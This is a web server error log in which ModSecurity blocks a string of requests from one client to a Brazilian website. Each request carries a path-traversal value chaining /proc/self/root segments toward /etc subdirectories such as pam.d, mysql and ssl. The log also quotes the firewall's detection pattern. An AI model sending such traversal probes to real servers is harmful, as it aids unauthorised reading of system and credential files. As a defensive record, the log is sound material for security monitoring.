[Mon Mar 16 17:41:52.963491 2026] [:error] [pid 21806:tid 140411716749056] [client 74.7.241.46:49086] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhrENSswJuvopo3lOh4rAAAAIM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:41:54.255307 2026] [:error] [pid 21805:tid 140411699963648] [client 74.7.241.46:49102] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhrErABkC4fWIHEf8EO_QAAAEU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:41:56.538000 2026] [:error] [pid 15568:tid 140411741927168] [client 74.7.241.46:49112] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhrE6QpVkWug9HeOt9OEwAAA0A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:41:57.953201 2026] [:error] [pid 21805:tid 140411725141760] [client 74.7.241.46:49118] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhrFbABkC4fWIHEf8EPAgAAAEI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:42:00.118932 2026] [:error] [pid 21805:tid 140411658000128] [client 74.7.241.46:53206] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhrGLABkC4fWIHEf8EPCgAAAEo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:42:03.526088 2026] [:error] [pid 29507:tid 140411599251200] [client 74.7.241.46:53216] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhrGkr9dMAiw-8KANNjIwAAARE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:42:06.095611 2026] [:error] [pid 21805:tid 140411725141760] [client 74.7.241.46:53224] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhrHrABkC4fWIHEf8EPEAAAAEI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:42:07.477332 2026] [:error] [pid 21806:tid 140411590858496] [client 74.7.241.46:53238] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhrH9SswJuvopo3lOh4uQAAAJI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:42:10.023084 2026] [:error] [pid 10651:tid 140411691570944] [client 74.7.241.46:60854] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhrIrysWC90G-1nBrBeOgAAAYY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:42:11.337231 2026] [:error] [pid 29507:tid 140411582465792] [client 74.7.241.46:60860] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhrI0r9dMAiw-8KANNjJwAAARM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:42:12.551431 2026] [:error] [pid 29802:tid 140411716749056] [client 74.7.241.46:60876] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhrJM_BxrYCr4hPDw8D_gAAAcM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:42:13.967066 2026] [:error] [pid 15061:tid 140411658000128] [client 74.7.241.46:60890] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhrJaTCbgAP5jq5TehFcgAAAso"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:42:15.206702 2026] [:error] [pid 21805:tid 140411540502272] [client 74.7.241.46:60904] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhrJ7ABkC4fWIHEf8EPGgAAAFg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:42:17.602524 2026] [:error] [pid 21806:tid 140411574073088] [client 74.7.241.46:60910] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhrKdSswJuvopo3lOh4xQAAAJQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:42:19.929229 2026] [:error] [pid 15568:tid 140411590858496] [client 74.7.241.46:55178] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhrK6QpVkWug9HeOt9OHAAAA1I"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:42:21.244471 2026] [:error] [pid 10651:tid 140411641214720] [client 74.7.241.46:55182] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhrLbysWC90G-1nBrBeQgAAAYw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:42:22.467456 2026] [:error] [pid 15061:tid 140411716749056] [client 74.7.241.46:55186] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhrLqTCbgAP5jq5TehFeAAAAsM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:42:23.761467 2026] [:error] [pid 29802:tid 140411725141760] [client 74.7.241.46:55194] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhrL8_BxrYCr4hPDw8EAAAAAcI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:42:24.991434 2026] [:error] [pid 21805:tid 140411557287680] [client 74.7.241.46:55196] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhrMLABkC4fWIHEf8EPJgAAAFY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:42:26.310731 2026] [:error] [pid 10831:tid 140411733534464] [client 74.7.241.46:55202] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhrMo6lpbStxTqkSkuDkQAAAkE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:42:27.505792 2026] [:error] [pid 10651:tid 140411708356352] [client 74.7.241.46:55218] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhrM7ysWC90G-1nBrBeRwAAAYQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
